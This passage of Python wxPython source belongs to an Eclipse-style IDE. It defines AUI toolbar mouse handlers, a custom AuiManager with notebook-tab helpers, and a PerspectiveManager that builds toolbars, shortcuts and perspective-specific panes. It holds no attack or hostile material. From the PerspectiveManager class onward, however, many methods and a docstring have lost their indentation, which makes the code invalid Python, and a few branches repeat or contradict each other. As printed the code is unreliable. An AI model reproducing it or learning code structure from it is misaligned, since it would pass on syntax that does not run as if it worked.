            self._action_item = None

    def OnRightDown(self, event):
        """
        Handles the ``wx.EVT_RIGHT_DOWN`` event for :class:`AuiToolBar`.
        :param `event`: a :class:`MouseEvent` event to be processed.
        """
        cli_rect = wx.Rect(wx.Point(0, 0), self.GetClientSize())
        if self._gripper_sizer_item:
            gripper_rect = self._gripper_sizer_item.GetRect()
            if gripper_rect.Contains(event.GetPosition()):
                return
        if self.GetOverflowVisible():
            dropdown_size = self._art.GetElementSize(aui.AUI_TBART_OVERFLOW_SIZE)
            if dropdown_size > 0 and event.GetX() > cli_rect.width - dropdown_size and \
               event.GetY() >= 0 and event.GetY() < cli_rect.height and self._art:
                return
        self._action_pos = wx.Point(*event.GetPosition())
        self._action_item = self.FindToolForPosition(*event.GetPosition())
        if self._action_item:
            if self._action_item.state & aui.AUI_BUTTON_STATE_DISABLED:
                self._action_pos = wx.Point(-1, -1)
                self._action_item = None
                return

    def OnRightUp(self, event):
        """
        Handles the ``wx.EVT_RIGHT_UP`` event for :class:`AuiToolBar`.
        :param `event`: a :class:`MouseEvent` event to be processed.
        """
        hit_item = self.FindToolForPosition(*event.GetPosition())
        if self._action_item and hit_item == self._action_item:
            e = AuiToolBarEvent(wxEVT_COMMAND_AUITOOLBAR_RIGHT_CLICK, self._action_item.id)
            e.SetEventObject(self)
            e.SetToolId(self._action_item.id)
            e.SetClickPoint(self._action_pos)
            self.ProcessEvent(e)
            self.DoIdleUpdate()
        else:
            # right-clicked on the invalid area of the toolbar
            e = AuiToolBarEvent(wxEVT_COMMAND_AUITOOLBAR_RIGHT_CLICK, -1)
            e.SetEventObject(self)
            e.SetToolId(-1)
            e.SetClickPoint(self._action_pos)
            self.ProcessEvent(e)
            self.DoIdleUpdate()
        # reset member variables
        self._action_pos = wx.Point(-1, -1)
        self._action_item = None

    def OnMiddleDown(self, event):
        """
        Handles the ``wx.EVT_MIDDLE_DOWN`` event for :class:`AuiToolBar`.
        :param `event`: a :class:`MouseEvent` event to be processed.
        """
        cli_rect = wx.Rect(wx.Point(0, 0), self.GetClientSize())
        if self._gripper_sizer_item:
            gripper_rect = self._gripper_sizer_item.GetRect()
            if gripper_rect.Contains(event.GetPosition()):
                return
        if self.GetOverflowVisible():
            dropdown_size = self._art.GetElementSize(aui.AUI_TBART_OVERFLOW_SIZE)
            if dropdown_size > 0 and event.GetX() > cli_rect.width - dropdown_size and \
               event.GetY() >= 0 and event.GetY() < cli_rect.height and self._art:
                return
        self._action_pos = wx.Point(*event.GetPosition())
        self._action_item = self.FindToolForPosition(*event.GetPosition())
        if self._action_item:
            if self._action_item.state & aui.AUI_BUTTON_STATE_DISABLED:
                self._action_pos = wx.Point(-1, -1)
                self._action_item = None
                return

    def OnMiddleUp(self, event):
        """
        Handles the ``wx.EVT_MIDDLE_UP`` event for :class:`AuiToolBar`.
        :param `event`: a :class:`MouseEvent` event to be processed.
        """
        hit_item = self.FindToolForPosition(*event.GetPosition())
        if self._action_item and hit_item == self._action_item:
            if hit_item.kind == ITEM_NORMAL:
                e = AuiToolBarEvent(wxEVT_COMMAND_AUITOOLBAR_MIDDLE_CLICK, self._action_item.id)
                e.SetEventObject(self)
                e.SetToolId(self._action_item.id)
                e.SetClickPoint(self._action_pos)
                self.ProcessEvent(e)
                self.DoIdleUpdate()
        # reset member variables
        self._action_pos = wx.Point(-1, -1)
        self._action_item = None

    def OnMotion(self, event):
        """
        Handles the ``wx.EVT_MOTION`` event for :class:`AuiToolBar`.
        :param `event`: a :class:`MouseEvent` event to be processed.
        """
        # start a drag event
        if not self._dragging and self._action_item != None and self._action_pos != wx.Point(-1, -1) and \
           abs(event.GetX() - self._action_pos.x) + abs(event.GetY() - self._action_pos.y) > 5:
            self.SetToolTip("")
            self._dragging = True
            e = AuiToolBarEvent(wxEVT_COMMAND_AUITOOLBAR_BEGIN_DRAG, self.GetId())
            e.SetEventObject(self)
            e.SetToolId(self._action_item.id)
            self.ProcessEvent(e)
            self.DoIdleUpdate()
            return
        hit_item = self.FindToolForPosition(*event.GetPosition())
        if hit_item:
            if not hit_item.state & aui.AUI_BUTTON_STATE_DISABLED:
                self.SetHoverItem(hit_item)
            else:
                self.SetHoverItem(None)
        else:
            # no hit item, remove any hit item
            self.SetHoverItem(hit_item)
        # figure out tooltips
        packing_hit_item = self.FindToolForPositionWithPacking(*event.GetPosition())
        if packing_hit_item:
            if packing_hit_item != self._tip_item:
                self._tip_item = packing_hit_item
                if packing_hit_item.short_help != "":
                    self.StartPreviewTimer()
                    self.SetToolTip(packing_hit_item.short_help)
                else:
                    self.SetToolTip("")
                    self.StopPreviewTimer()
        else:
            self.SetToolTip("")
            self._tip_item = None
            self.StopPreviewTimer()
        # if we've pressed down an item and we're hovering
        # over it, make sure it's state is set to pressed
        if self._action_item:
            if self._action_item == hit_item:
                self.SetPressedItem(self._action_item)
            else:
                self.SetPressedItem(None)
        # figure out the dropdown button state (are we hovering or pressing it?)
        self.RefreshOverflowState()
        self.Realize()
class MyAuiManager(aui.AuiManager):
    """AuiManager subclass with notebook-tab helpers used by this app.

    Adds addTabByWindow() for adding panes as auto-notebook tabs, a
    substring-based pane lookup, and an OnSize override that keeps the
    perspective toolbar docked at the right edge.
    """

    def __init__(self, managed_window=None, agwFlags=None):
        super(MyAuiManager, self).__init__(managed_window=managed_window, agwFlags=agwFlags)

    def addTabByWindow(self, window=None , icon=None, imageName="script.png", name=None, captionName=None, tabDirection=5):
        '''
        This method always create a new tab for the window.
        tabDirection=2 is the right
        tabDirection=3 is the bottom
        tabDirection=4 is the left
        tabDirection=5 is the center
        '''
        self.SetAutoNotebookStyle(aui.AUI_NB_DEFAULT_STYLE | wx.BORDER_NONE)
        # Default the internal pane name to the visible caption.
        if name == None:
            name = captionName
        isPaneAdded = False
        # Look for an existing pane docked in the requested direction and
        # add the new window as a notebook page next to it.
        for pane in self.GetAllPanes():
            # logger.debug(pane.dock_direction_get())
            if pane.dock_direction_get() == tabDirection:  # adding to center tab
                if not icon:
                    icon = FileOperations().getImageBitmap(imageName=imageName)
                auiPanInfo = aui.AuiPaneInfo().Icon(icon).\
                    Name(name).Caption(captionName).LeftDockable(True).Direction(wx.TOP).\
                    Center().Layer(0).Position(0).CloseButton(True).MaximizeButton(True).MinimizeButton(True).MinSize(200, -1)\
                    .BestSize(200, -1).CaptionVisible(visible=True)
                targetTab = pane
                # Create the notebook container on first use, then dock the
                # new pane into it.
                if not pane.HasNotebook():
                    self.CreateNotebookBase(self._panes, pane)
                    # targetTab.NotebookPage(pane.notebook_id)
                    self.AddPane(window, auiPanInfo, target=targetTab)
                    isPaneAdded = True
                    # self._mgr._notebooks
                    # self._mgr.ActivatePane(targetTab.window)
                else:
                    self.AddPane(window, auiPanInfo, target=targetTab)
                    isPaneAdded = True
                break
        # No pane in that direction yet: add the window as a fresh pane.
        if not isPaneAdded:
            auiPanInfo = aui.AuiPaneInfo().Icon(FileOperations().getImageBitmap(imageName=imageName)).\
                Name(name).Caption(captionName).LeftDockable(True).Dockable(True).Movable(True).MinSize(200, -1).BestSize(200, -1).CaptionVisible(visible=True).Direction(wx.TOP).\
                Center().Layer(0).Position(0).CloseButton(True).MaximizeButton(True).MinimizeButton(True).CaptionVisible(visible=True)
            auiPanInfo.dock_direction = tabDirection
            self.AddPane(window, auiPanInfo)
        self.Update()

    def OnTabBeginDrag(self, event):
        """
        Handles the ``EVT_AUINOTEBOOK_BEGIN_DRAG`` event.
        :param `event`: a :class:`~wx.lib.agw.aui.auibook.AuiNotebookEvent` event to be processed.
        """
        if self._masterManager:
            self._masterManager.OnTabBeginDrag(event)
        else:
            paneInfo = self.PaneFromTabEvent(event)
            if paneInfo.IsOk():
                # It's one of ours!
                self._action = actionDragFloatingPane
                mouse = wx.GetMousePosition()
                # set initial float position - may have to think about this
                # offset a bit more later ...
                self._action_offset = wx.Point(20, 10)
                self._toolbar_action_offset = wx.Point(20, 10)
                paneInfo.floating_pos = mouse - self._action_offset
                paneInfo.dock_pos = AUI_DOCK_NONE
                paneInfo.notebook_id = -1
                tab = event.GetEventObject()
                try:
                    if tab.HasCapture():
                        tab.ReleaseMouse()
                # NOTE(review): bare except also swallows KeyboardInterrupt /
                # SystemExit — consider narrowing to `except Exception:`.
                except:
                    pass
                # float the window
                if paneInfo.IsMaximized():
                    self.RestorePane(paneInfo)
                paneInfo.Float()
                # The call to Update may result in
                # the notebook that generated this
                # event being deleted, so we have
                # to do the call asynchronously.
                wx.CallAfter(self.Update)
                self._action_window = paneInfo.window
                self._frame.CaptureMouse()
                event.SetDispatched(True)
            else:
                # not our window
                event.Skip()

    def GetPaneByHavingName(self, name):
        """
        This version of :meth:`GetPane` looks up a pane based on a 'pane name'.
        :param string `name`: the pane name.
        :see: :meth:`GetPane`
        """
        # NOTE(review): this is a substring test (pane's name contained in
        # *name*), not equality — presumably intentional given the method
        # name; verify against callers before changing.
        for p in self._panes:
            if p.name in name:
                return p
        return NonePaneInfo

    def hidePane(self, window):
        # Thin convenience wrapper around ShowPane(show=False).
        self.ShowPane(window, show=False)

    def OnSize(self, event):
        super().OnSize(event)
        (x, y) = self._frame.GetClientSize()
        # Keep the perspective toolbar glued to the right edge: each button
        # is 32px wide; the offsets compensate for the two non-button items.
        perspectiveToolbar = self.GetPane("perspectiveToolbar")
        perspectiveToolbar.dock_pos = x - ((len(perspectiveToolbar.window._items) - 2) * 32) + 5
        self.Update()
        # self.DoDropToolbar(self._docks, self._panes, perspectiveToolbar, point, wx.Point(0,0))
# self.DoDropToolbar(self._docks, self._panes, perspectiveToolbar, point, wx.Point(0,0))
class PerspectiveManager(object):
"""Creates a perspective manager for the given aui managed window.
It supports saving and loading of on disk perspectives as created by
calling SavePerspective from the AuiManager. Mixin class for a wx.Frame.
"""
    def __init__(self, base=None):
        """Initializes the perspective manager.

        Builds the AUI manager and toolbars via createAuiManager(), subscribes
        to the 'perspectiveClicked' and 'onUpdatePageText' pubsub topics, and
        installs the global accelerator table.

        @param base: path to configuration cache where perspectives would be
                     loaded from / saved to.  NOTE(review): `base` is not used
                     in this constructor — confirm whether it is still needed.
        """
        super(PerspectiveManager, self).__init__()
        # id -> AuiToolBarItem cache; filled on the first constructViewToolBar()
        # call and reused to re-filter the toolbar per perspective.
        self.toolbarItems = {}
        self.createAuiManager()
        pub.subscribe(self.__onObjectAdded, 'perspectiveClicked')
        pub.subscribe(self.__onUpdatePageText, 'onUpdatePageText')
        # Global keyboard shortcuts; ids are routed through EVT_MENU bindings.
        self.accel_tbl = wx.AcceleratorTable([
            (wx.ACCEL_CTRL, ord('N'), ID_NEW),
            (wx.ACCEL_CTRL, ord('Y'), ID_REDO),
            (wx.ACCEL_CTRL, ord('Z'), ID_UNDO),
            (wx.ACCEL_CTRL, ord('C'), ID_COPY),
            (wx.ACCEL_CTRL, ord('V'), ID_PASTE),
            (wx.ACCEL_CTRL, ord('X'), ID_CUT),
            (wx.ACCEL_CTRL | wx.ACCEL_ALT, wx.WXK_DOWN, ID_DUPLICATE_LINE),
            (wx.ACCEL_CTRL, ord('S'), ID_SAVE),
            (wx.ACCEL_CTRL, ord('H'), ID_SEARCH_FILE),
            (wx.ACCEL_CTRL | wx.ACCEL_SHIFT, ord('F'), ID_FORMAT_FILE),
            (wx.ACCEL_CTRL | wx.ACCEL_SHIFT, ord('R'), ID_RESOURCE),
            (wx.ACCEL_CTRL | wx.ACCEL_SHIFT, ord('T'), ID_OPEN_TYPE),
            # (wx.ACCEL_CTRL, ord('V'), wx.ID_PASTE),
            # (wx.ACCEL_ALT, ord('X'), wx.ID_PASTE),
            # (wx.ACCEL_SHIFT | wx.ACCEL_ALT, ord('Y'), wx.ID_PASTE)
        ])
        self.SetAcceleratorTable(self.accel_tbl)
def __onUpdatePageText(self, filePath, extra1, extra2=None):
# no longer need to access data through message.data.
logger.info(f'PerspectiveManager.__onUpdatePageText: {filePath}')
viewToolbar = self._mgr.GetPane("viewToolbar")
print(extra1)
toolSave = viewToolbar.window.FindTool(ID_SAVE)
toolSaveAll = viewToolbar.window.FindTool(ID_SAVE_ALL)
toolSaveAll.state = aui.AUI_BUTTON_STATE_NORMAL
toolSave.state = aui.AUI_BUTTON_STATE_NORMAL
logger.info(toolSave.state)
self.updateTitle(title=filePath)
self._mgr.Update()
if extra2:
print(extra2)
def __onObjectAdded(self, data, extra1, extra2=None):
# no longer need to access data through message.data.
print('PerspectiveManager', repr(data), 'is added')
print(extra1)
if extra2:
print(extra2)
    def createAuiManager(self):
        """Create the AUI manager and the default pane layout.

        Builds the view toolbar, the right-aligned perspective toolbar and the
        Welcome pane, saves the default perspective string, applies the
        notebook style, and wires all AUI / close / timer event handlers.
        """
        logger.debug('createAuiManager')
        # tell FrameManager to manage this frame
        self._mgr = MyAuiManager()
        self._mgr.SetManagedWindow(self)
        # set up default notebook style
        self._notebook_style = aui.AUI_NB_DEFAULT_STYLE | wx.BORDER_NONE
        self._notebook_theme = 1
        # min size for the frame itself isn't completely done.
        # see the end up AuiManager.Update() for the test
        # code. For now, just hard code a frame minimum size
        self.SetMinSize(wx.Size(100, 100))
        self._perspectives = []
        # Main view toolbar, pinned to the top-left.
        self._mgr.AddPane(self.constructViewToolBar(), aui.AuiPaneInfo().
                          Name("viewToolbar").Caption("View Toolbar").
                          ToolbarPane().Top().Row(1).Position(1).CloseButton(True).
                          LeftDockable(False).RightDockable(False).Gripper(True))
        # Perspective switcher toolbar, right-aligned via definePoint().
        self._mgr.AddPane(self.constructPerspectiveToolBar(), aui.AuiPaneInfo().
                          Name("perspectiveToolbar").Caption("Perspective Toolbar").
                          ToolbarPane().Top().Row(1).Position(1).CloseButton(True).
                          LeftDockable(False).RightDockable(False).Gripper(True), self.definePoint())
        # (Several optional panes — file explorer, database navigator, console,
        # SQL log, variable view, worksheets — were left commented out here.)
        self._mgr.AddPane(WelcomePanel(self), aui.AuiPaneInfo().Icon(self.fileOperations.getImageBitmap(imageName="welcome16.png")).BestSize(500, -1).
                          Name("onWelcome").Caption("Welcome").Dockable(True).Movable(True).MinSize(500, -1).CaptionVisible(visible=True).Direction(wx.TOP).
                          Center().Layer(0).Position(0).CloseButton(True).MaximizeButton(True).MinimizeButton(True))
        self._mgr.GetPane("onWelcome").Show()
        viewToolbar = self._mgr.GetPane("viewToolbar")
        viewToolbar.Show()
        # NOTE(review): no pane named "variableView" is ever added (its AddPane
        # call is commented out), so GetPane returns the null pane-info here —
        # confirm this Show() is intentional / harmless.
        self._mgr.GetPane("variableView").Show()
        perspectiveToolbar = self._mgr.GetPane("perspectiveToolbar")
        # Keep both toolbars on the same dock row.
        perspectiveToolbar.dock_row = viewToolbar.dock_row
        perspectiveToolbar.Show()
        self.perspective_default = self._mgr.SavePerspective()
        perspective_all = self._mgr.SavePerspective()
        self.setStyleToPanes()
        all_panes = self._mgr.GetAllPanes()
        # "commit" all changes made to FrameManager
        self._mgr.Update()
        # some more event
        self.Bind(aui.EVT_AUI_PANE_CLOSE, self.OnPaneClose)
        self.Bind(aui.EVT_AUINOTEBOOK_ALLOW_DND, self.OnAllowNotebookDnD)
        self.Bind(aui.EVT_AUINOTEBOOK_PAGE_CLOSE, self.OnNotebookPageClose)
        self.Bind(aui.EVT_AUI_PANE_FLOATING, self.OnFloatDock)
        self.Bind(aui.EVT_AUI_PANE_FLOATED, self.OnFloatDock)
        self.Bind(aui.EVT_AUI_PANE_DOCKING, self.OnFloatDock)
        self.Bind(aui.EVT_AUI_PANE_DOCKED, self.OnFloatDock)
        self.Bind(wx.EVT_CLOSE, self.OnClose)
        self.Bind(wx.EVT_TIMER, self.TimerHandler)
        # 100ms pulse timer driving the busy gauge (see TimerHandler).
        self.timer = wx.Timer(self)
        self.timer.Start(100)
#######################################################################################
def definePoint(self):
'''
right align toolbar
'''
managed_window = self._mgr.GetManagedWindow()
wnd_pos = managed_window.GetPosition()
(x, y) = wnd_size = managed_window.GetSize()
point = wx.Point(x - ((len(self.perspectiveList) - 1) * 32) + 5, 0)
return point
    def OnPaneClose(self, event):
        # EVT_AUI_PANE_CLOSE handler; currently only logs.  The commented
        # block below shows a previous confirm-before-close prompt.
        logger.debug("OnPaneClose")
        # if event.pane.name == "test10":
        # msg = "Are you sure you want to "
        # if event.GetEventType() == aui.wxEVT_AUI_PANE_MINIMIZE:
        # msg += "minimize "
        # else:
        # msg += "close/hide "
        #
        # res = wx.MessageBox(msg + "this pane?", "AUI", wx.YES_NO, self)
        # if res != wx.YES:
        # event.Veto()
def OnAllowNotebookDnD(self, event):
# for the purpose of this test application, explicitly
# allow all noteboko drag and drop events
event.Allow()
def OnNotebookPageClose(self, event):
logger.debug("OnNotebookPageClose")
ctrl = event.GetEventObject()
# if isinstance(ctrl.GetPage(event.GetSelection()), wx.html.HtmlWindow):
#
# res = wx.MessageBox("Are you sure you want to close/hide this notebook page?",
# "AUI", wx.YES_NO, self)
# if res != wx.YES:
# event.Veto()
def OnFloatDock(self, event):
paneLabel = event.pane.caption
etype = event.GetEventType()
strs = "Pane %s " % paneLabel
if etype == aui.wxEVT_AUI_PANE_FLOATING:
strs += "is about to be floated"
if event.pane.name == "test8" and self._veto_tree:
event.Veto()
strs += "... Event vetoed by user selection!"
logger.debug(strs)
return
elif etype == aui.wxEVT_AUI_PANE_FLOATED:
strs += "has been floated"
elif etype == aui.wxEVT_AUI_PANE_DOCKING:
strs += "is about to be docked"
if event.pane.name == "test11" and self._veto_text:
event.Veto()
strs += "... Event vetoed by user selection!"
logger.debug(strs)
return
elif etype == aui.wxEVT_AUI_PANE_DOCKED:
strs += "has been docked"
logger.debug(strs)
def __del__(self):
self.timer.Stop()
    def OnClose(self, event):
        # Frame shutdown: stop the pulse timer, detach the AUI manager from
        # the frame (UnInit is required to avoid leaking the manager), then
        # let default close handling continue.
        self.timer.Stop()
        self._mgr.UnInit()
        event.Skip()
def TimerHandler(self, event):
try:
self.gauge.Pulse()
except:
self.timer.Stop()
#######################################################################################
def setStyleToPanes(self):
all_panes = self._mgr.GetAllPanes()
for pane in all_panes:
if isinstance(pane.window, aui.AuiNotebook):
nb = pane.window
nb.SetAGWWindowStyleFlag(self._notebook_style)
nb.SetArtProvider(aui.ChromeTabArt())
nb.Refresh()
nb.Update()
    def constructPerspectiveToolBar(self):
        """Build the perspective-switcher toolbar.

        Creates one tool per entry of self.perspectiveList, binds each entry's
        click handler, and presses the 'Python' tool as the startup default.

        @return: the populated EclipseAuiToolbar
        """
        # tb1 = aui.AuiToolBar(self, -1, agwStyle=aui.AUI_TB_DEFAULT_STYLE | wx.NO_BORDER)
        tb1 = EclipseAuiToolbar(self)
        # Each entry: [tool id, label, icon file, short help, click handler];
        # an empty list produces a separator.
        self.perspectiveList = [
            [ID_OTHER_PERSPECTIVE, "Open Perspective", 'new_persp.png', 'Open Perspective', None],
            [],
            [ID_JAVA_PERSPECTIVE, "Java", 'jperspective.png', 'Java', self.onPerspeciveSelection],
            [ID_JAVA_EE_PERSPECTIVE, "Java EE", 'javaee_perspective.png', 'Java EE', self.onPerspeciveSelection],
            [ID_DEBUG_PERSPECTIVE, "Debug", 'debug_persp.png', 'Debug', self.onPerspeciveSelection],
            [ID_PYTHON_PERSPECTIVE, "Python", 'python_perspective.png', 'Python', self.onPerspeciveSelection],
            [ID_DATABASE_PERSPECTIVE, "Database", 'database.png', 'Database', self.onPerspeciveSelection],
            [ID_GIT_PERSPECTIVE, "Git", 'gitrepository.png', 'Git', self.onPerspeciveSelection],
            [ID_RESOURCE_PERSPECTIVE, "Resources", 'resource_persp.png', 'Resources', self.onPerspeciveSelection],
            [ID_CALIBRE_PERSPECTIVE, "Calibre", 'vl_16.png', 'Calibre', self.onPerspeciveSelection],
        ]
        for perspectiveName in self.perspectiveList:
            if len(perspectiveName) > 1:
                toolBarItem = tb1.AddSimpleTool(perspectiveName[0], perspectiveName[1], self.fileOperations.getImageBitmap(imageName=perspectiveName[2]), short_help_string=perspectiveName[3])
                if perspectiveName[4]:
                    self.Bind(wx.EVT_MENU, perspectiveName[4], id=perspectiveName[0])
                # 'Python' is the default perspective on startup.
                if toolBarItem.label == 'Python':
                    self.selectedPerspectiveName = 'python'
                    tb1.SetPressedItem(toolBarItem)
            else:
                tb1.AddSeparator()
        return tb1
# def onOpenPerspecitve(self, event):
# logger.debug('onOpenPerspecitve')
def selectItem(self, id=None):
perspectiveToolbar = self._mgr.GetPane("perspectiveToolbar")
item = perspectiveToolbar.window.getToolBarItemById(id)
perspectiveToolbar.window.EnableTool(item, True)
# def hideTools(self,viewToolbar.window, perspectiveName):
# pass
def viewToolBarByPerspective(self, perspectiveName):
viewToolbar = self._mgr.GetPane("viewToolbar")
# viewToolbar.window.DeleteTool(wx.ID_PREFERENCES)
self.constructViewToolBar(viewToolbar.window, perspectiveName)
s = viewToolbar.window.GetMinSize()
viewToolbar.BestSize(s)
allowedInstanceForProspective = [
# SqlConsoleOutputPanel,
py.shell.Shell,
PythonExplorerPanel,
DataSourcePanel,
CreatingJavaExplorerPanel,
FileBrowser,
]
if self.selectedPerspectiveName == 'database':
allowedInstanceForProspective.remove(DataSourcePanel)
elif self.selectedPerspectiveName == 'python':
allowedInstanceForProspective.remove(PythonExplorerPanel)
allowedInstanceForProspective.remove(py.shell.Shell)
elif self.selectedPerspectiveName == 'java':
allowedInstanceForProspective.remove(CreatingJavaExplorerPanel)
elif self.selectedPerspectiveName == 'resource':
allowedInstanceForProspective.remove(FileBrowser)
elif self.selectedPerspectiveName == 'java':
allowedInstanceForProspective.remove(CreatingJavaExplorerPanel)
elif self.selectedPerspectiveName == 'git':
allowedInstanceForProspective.remove(CreatingJavaExplorerPanel)
# for pane in self._mgr.GetAllPanes():
# if pane.window:
# for instance in allowedInstanceForProspective :
# if isinstance(pane.window, instance):
# self._mgr.ClosePane(pane)
# pane.window.Destroy()
# pane.DestroyOnClose(True)
if self.selectedPerspectiveName == 'database':
self.openPanel(name="consoleOutput", imageName="console_view.png", captionName="Console", tabDirection=3)
self.openPanel(name="databaseNaviagor", imageName="folder_database.png", captionName="Database Navigator", tabDirection=4)
elif self.selectedPerspectiveName == 'python':
self.openPanel(name="consoleOutput", imageName="console_view.png", captionName="Console", tabDirection=3)
self.openPanel(name="pythonShellView", imageName="shell.png", captionName="Python Shell", tabDirection=3)
self.openPanel(name="pythonPackageExplorer", imageName="package_explorer.png", captionName="Python Package Explorer", tabDirection=4)
elif self.selectedPerspectiveName == 'resource':
self.openPanel(name="consoleOutput", imageName="console_view.png", captionName="Console", tabDirection=3)
self.openPanel(name="fileExplorer", imageName="file_explorer.png", captionName="File Explorer", tabDirection=4)
elif self.selectedPerspectiveName == 'java':
self.openPanel(name="consoleOutput", imageName="console_view.png", captionName="Console", tabDirection=3)
self.openPanel(name="javaPackageExplorer", imageName="package_explorer.png", captionName="Java Package Explorer", tabDirection=4)
elif self.selectedPerspectiveName == 'calibre':
self.openPanel(name="bookBrowser", imageName="library-16.png", captionName="Book Browser", tabDirection=5)
self.openPanel(name="bookExplorer", imageName="package_explorer.png", captionName="Book Explorer", tabDirection=4)
# else:
# databaseNaviagorPane = self._mgr.GetPane("databaseNaviagor")
# databaseNaviagorPane.Show(False)
for pane in self._mgr.GetAllPanes():
if pane.window:
for instance in allowedInstanceForProspective :
if isinstance(pane.window, instance):
self._mgr.ClosePane(pane)
for pane in self._mgr.GetAllPanes():
if pane.window:
logger.debug(f'pane.window:{pane.window}, pane.window.IsShown():{pane.window.IsShown()}')
self.appendSubMenu(menuBar=self.GetMenuBar(), selectedPerspectiveName=self.selectedPerspectiveName)
self._mgr.Update()
print('viewToolBarByPerspective')
# def openPanel(self, name="consoleOutput", imageName="console_view.png", captionName="Console", tabDirection=3):
# # name="consoleOutput"
# pane = self._mgr.GetPane(name)
# panel = wx.Panel(self)
# if pane.window == None:
# if name == "consoleOutput":
# panel = SqlConsoleOutputPanel(self)
# elif name == "databaseNaviagor":
# panel = DataSourcePanel(self)
# elif name == "pythonPackageExplorer":
# panel = CreatingPythonExplorerPanel(self)
# elif name == "projectExplorerView":
# panel = CreatingProjectExplorerPanel(self)
# elif name == "javaPackageExplorer":
# panel = CreatingJavaExplorerPanel(self)
# elif name == "pythonShellView":
# intro = f'{py.version.VERSION}'
# panel = py.shell.Shell(self, -1, introText=intro)
# elif name == "terminalView":
# panel = CreatingPythonExplorerPanel(self)
# elif name == "navigatorView":
# panel = CreatingPythonExplorerPanel(self)
# elif name == "tasksView":
# panel = CreatingPythonExplorerPanel(self)
# elif name == "fileExplorer":
# panel = FileBrowser(self, size=(500, 300))
# elif name == "bookExplorer":
# panel = BookExplorerPanel(self, size=(500, 300))
#
# self._mgr.addTabByWindow(panel, imageName=imageName, name=name , captionName=captionName, tabDirection=tabDirection)
# elif not pane.IsShown():
# pane.dock_direction = tabDirection
# window = pane.window
# if window:
# window.Show()
# pane.Show(True)
# # item.state=4
def onPerspeciveSelection(self, event):
logger.debug('onPerspeciveSelection')
# pub.sendMessage('perspectiveClicked', data=42, extra1='onJavaPerspective')
self.selectItem(event.Id)
if event.Id == ID_CALIBRE_PERSPECTIVE:
self.selectedPerspectiveName = 'calibre'
self.viewToolBarByPerspective(self.selectedPerspectiveName)
if event.Id == ID_JAVA_PERSPECTIVE:
self.selectedPerspectiveName = 'java'
self.viewToolBarByPerspective(self.selectedPerspectiveName)
elif event.Id == ID_JAVA_EE_PERSPECTIVE:
self.selectedPerspectiveName = 'java ee'
self.viewToolBarByPerspective(self.selectedPerspectiveName)
elif event.Id == ID_DEBUG_PERSPECTIVE:
self.selectedPerspectiveName = 'debug'
self.viewToolBarByPerspective(self.selectedPerspectiveName)
elif event.Id == ID_PYTHON_PERSPECTIVE:
self.selectedPerspectiveName = 'python'
self.viewToolBarByPerspective(self.selectedPerspectiveName)
elif event.Id == ID_DATABASE_PERSPECTIVE:
self.selectedPerspectiveName = 'database'
self.viewToolBarByPerspective(self.selectedPerspectiveName)
elif event.Id == ID_GIT_PERSPECTIVE:
self.selectedPerspectiveName = 'git'
self.viewToolBarByPerspective(self.selectedPerspectiveName)
elif event.Id == ID_RESOURCE_PERSPECTIVE:
self.selectedPerspectiveName = 'resource'
self.viewToolBarByPerspective(self.selectedPerspectiveName)
def constructViewToolBar(self, toobar=None, perspectiveName='python'):
# create some toolbars
# tb1 = aui.AuiToolBar(self, -1, agwStyle=aui.AUI_TB_DEFAULT_STYLE | wx.NO_BORDER)
if toobar == None:
self._ctrl = None
toobar = EclipseAuiToolbar(self)
# id, leble, imageName, lebel, method,setToolDropdown , list of perspective, initial state(disable/enable ), kind=wx.ITEM_CHECK
tools = [
(ID_NEW, "New", "new_con.png", 'New', self.onNewMenu, True, ['resource', 'python', 'java', 'debug', 'java ee'], True, wx.ITEM_NORMAL),
(),
(ID_SAVE, "Save (Ctrl+S)", "save.png", 'Save (Ctrl+S)', self.onSave, False, ['resource', 'python', 'java', 'debug', 'java ee', 'database'], False, wx.ITEM_NORMAL),
(ID_SAVE_ALL, "Save All (Ctrl+Shift+S)", "saveall_edit.png", 'Save All (Ctrl+Shift+S)', self.onSaveAll, False, ['resource', 'python', 'java', 'debug', 'java ee', 'database'], False, wx.ITEM_NORMAL),
(ID_BUILD_ALL, "Build All (Ctrl+B)", "build_exec.png", "Build All (Ctrl+B)", None, False, [ 'python', 'java', 'java ee'], True, wx.ITEM_NORMAL),
(ID_TERMINAL, "Open a Terminal", "linux_terminal.png", "Open a Terminal (Ctrl+Shift+Alt+T)", self.onOpenTerminal, False, ['resource', 'python', 'java', 'debug', 'java ee'], True, wx.ITEM_NORMAL),
(),
(ID_SKIP_ALL_BREAKPOINTS, "Skip All Breakpoints (Ctrl+Alt+B)", "skip_brkp.png", "Skip All Breakpoints (Ctrl+Alt+B)", self.onSkipAllBreakPoints, False, ['resource', 'python', 'java', 'debug', 'java ee'], True, wx.ITEM_CHECK),
(ID_NEW_JAVA_PACKAGE, "New Java Package", "newpack_wiz.png", "New Java Package", self.onOpenTerminal, False, ['resource', 'java'], True, wx.ITEM_NORMAL),
(ID_NEW_JAVA_CLASS, "New Java Class", "newclass_wiz.png", "New Java Class", self.onOpenTerminal, True, ['resource', 'java'], True, wx.ITEM_NORMAL),
(ID_RESUME_DEBUG, "Resume", "resume_co.png", "Resume", self.onOpenTerminal, False, ['debug', 'java ee'], False, wx.ITEM_NORMAL),
(ID_SUSPEND_DEBUG, "Suspend", "suspend_co.png", "Suspend", self.onOpenTerminal, False, ['debug', 'java ee'], False, wx.ITEM_NORMAL),
(ID_TERMNATE_DEBUG, "Terminate", "terminatedlaunch_obj.png", "Terminate", self.onOpenTerminal, False, ['debug', 'java ee'], False, wx.ITEM_NORMAL),
(ID_DISCONNECT_DEBUG, "Disconnect", "disconnect_co.png", "Disconnect", self.onOpenTerminal, False, ['debug', 'java ee'], False, wx.ITEM_NORMAL),
(ID_STEP_INTO_DEBUG, "Step Into", "stepinto_co.png", "Step Into", self.onOpenTerminal, False, ['debug', 'java ee'], False, wx.ITEM_NORMAL),
(ID_STEP_OVER_DEBUG, "Step Over", "stepover_co.png", "Step Over", self.onOpenTerminal, False, ['debug', 'java ee'], False, wx.ITEM_NORMAL),
(ID_STEP_RETURN_DEBUG, "Step Return", "stepreturn_co.png", "Step Return", self.onOpenTerminal, False, ['debug', 'java ee'], False, wx.ITEM_NORMAL),
(),
(ID_DEBUG_AS_MENU, "Debug As...", "debug_exc.png", "Debug As...", self.onOpenTerminal, True, ['python', 'java', 'debug', 'java ee'], True, wx.ITEM_NORMAL),
(ID_RUN_AS_MENU, "Run As...", "run_exc.png", "Run As...", self.onRunAsMenu, True, ['python', 'java', 'debug', 'java ee'], True, wx.ITEM_NORMAL),
